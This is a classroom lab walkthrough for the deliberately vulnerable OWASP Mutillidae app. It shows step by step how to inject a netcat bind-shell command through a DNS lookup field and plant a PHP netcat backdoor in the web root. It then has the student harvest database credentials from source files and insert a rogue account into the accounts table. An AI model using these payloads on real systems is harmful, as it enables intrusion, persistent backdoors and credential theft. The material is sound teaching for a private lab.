ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views: 24298

(Mutillidae: Lesson 3)

{ Command Injection Netcat Session }


Section 0. Background Information
  • What Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

  • What is Command Injection?
    • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).

  • What is netcat?
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 R1
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.

  • Lab Notes
    • In this lab we will do the following:
      1. Execute netcat using the command injection/execution vulnerability.
      2. Create a netcat backdoor outside of the command injection vulnerability.
      3. Conduct PHP Reconnaissance
      4. Conduct Database Reconnaissance
      5. Add a user to the nowasp.accounts table.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

 

Section 2: Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine

     

  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

 

Section 4: Configure BackTrack Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  3. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 5: Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

     

Section 7: Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

 

Section 8: Netcat Command Execution
  1. Go to DNS Lookup
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
     
  2. Execute Netcat  
    • Notes(FYI):
      • Below we are going to append NetCat to the basic nslookup test.  :)
    • Instructions:
      1. www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
        • Make a FIFO named pipe.
        • Pipes allow separate processes to communicate without having been designed explicitly to work together.
        • This will allow two processes to connect to netcat.
        • nc -l 4444, tells netcat to listen and allow connections on port 4444.
      2. Click Lookup DNS
      3. Continue to next step
        • Note: No results will be displayed to this webpage, please continue to next step.
     
  3. Verifying Results
    • Note(FYI):
      1. Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
      2. Notice in the lower left corner, the status bar displays the message transferring data.
      3. Both of these messages are a good signs that netcat is running and listening for a connection.
    • Instructions:
      1. Continue to next section.

 

Section 9: Connecting to Netcat
  1. Connect to Netcat
    • Notes(FYI):
      • Implement the following instructions on the BackTrack VM
      • Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
      2. hostname
        • This is server hostname that hosts DVWA.
      3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.

     

  2. Directory and Username Reconnaissance
    • Notes (FYI):
      • We already know that we connected as the apache user, but we also want to know what is our current working directory.
      • Also, we want to know if we have the ability to create a file within the current working directory.   
    • Instructions:
      1. pwd
        • Print the current working directory
      2. uname -a
        • Print system information (eg., Operating System & Version, Kernel, etc).
      3. cat /etc/passwd > passwd.txt
        • Create a passwd.txt file located in /var/www/html/mutillidae
      4. ls -l $PWD/passwd.txt
        • List the passwd.txt file.

 

Section 10: Viewing /etc/passwd
  1. Open New FireFox Tab
    • Notes (FYI):
      • Perform the following instructions on BackTrack's Firefox.
    • Instructions:
      1. Click on the Green Plus to create a new tab

     

  2. View /etc/passwd
    • Notes (FYI):
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
      • It nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver.  (Prepare for some black magic).
    • Instructions:
      1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/passwd.txt

 

Section 11: Create PHP Backdoor
  1. Discover the Database Engine using the /etc/passwd file
    • Notes (FYI):
      • Perform the following instructions using your previous BackTrack Terminal Netcat session.
      • We now we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
      • Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.  
    • Instructions:
      1. echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
      2. ls -l $PWD/nc_connect.php
      3. chmod 700 nc_connect.php
      4. ls -l $PWD/nc_connect.php
      5. cat nc_connect.php

     

  2. Execute nc_connect.php
    • Notes (FYI):
      • Perform the next steps in BackTrack's second Firefox tab.
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
      • Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.  
    • Instructions:
      1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/nc_connect.php
      2. Continue to Next Step

     

  3. On BackTrack, Start up a "another" terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  4. Viewing your netcat sessions
    • Notes (FYI):
      • This terminal window will be used to connect to the nc_config.php netcat session.
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 3333
      2. whoami
      3. ps -eaf | egrep '(3333|4444)'

 

Section 10: PHP Script Interrogation
  1. List all php scripts
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal.
      • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
      • But, first, let's count all the php scripts and include files.
    • Instructions:
      1. pwd
        • This show the current working directory to be /var/www/html/mutillidae.
      2. find * -name "*.php" | wc -l
        • Count the number of php script located in the current working directory.
      3. find * -name "*.inc" | wc -l
        • Count the number of php include files located in the current working directory.

     

  2. List all php scripts
    • Notes (FYI):
      • Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
    • Instructions:
      1. find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
        • find * -name "*.inc", find all files with the *.inc extension in the current working directory.
        • xargs, build and execute command lines from standard input
        • grep -i password, ignore case and search for the string "password".
        • egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".

     

  3. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
      • I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
      • The name of the script that contains the database password is MySQLHandler.php.
    • Instructions:
      1. find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8

     

  4. Search MySQLHandler.php for authentication information
    • Notes (FYI):
      • Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
      • Notice the username (root), password (samurai), and database (nowasp) is listed in the results.
    • Instructions:
      1. find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10

 

Section 11: Database Interrogation
  1. Basic Database Interrogation
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal.
      • The below command shows you how to execute database commands in the netcat session.
      • show databases, allows you to view all databases.
      • use nowasp; show tables, means use the nowasp database and show its's tables.
    • Instructions:
      1. echo "show databases;" | mysql -uroot -psamurai
      2. echo "use nowasp; show tables;" | mysql -uroot -psamurai

     

  2. Interrogate the accounts table
    • Notes (FYI):
      • The below command shows you how to view the column fields of the accounts tables.
      • In addition, you will run a basic select statement to view the contents of the accounts table.
    • Instructions:
      1. echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
      2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai

     

  3. Create a new user in the accounts table
    • Notes (FYI):
      • The below command shows you how to create a new username using the MySQL insert command.
      • Pay attention to the last record of your select statement results.
    • Instructions:
      1. echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
      2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai

     

Section 12: Proof of Lab
  1. Proof of Lab
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal
      • Use nc_config.php netcat session for the below directions.
    • Instructions:
      1. echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
      2. netstat -nao | egrep '(3333|4444)'
      3. date
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth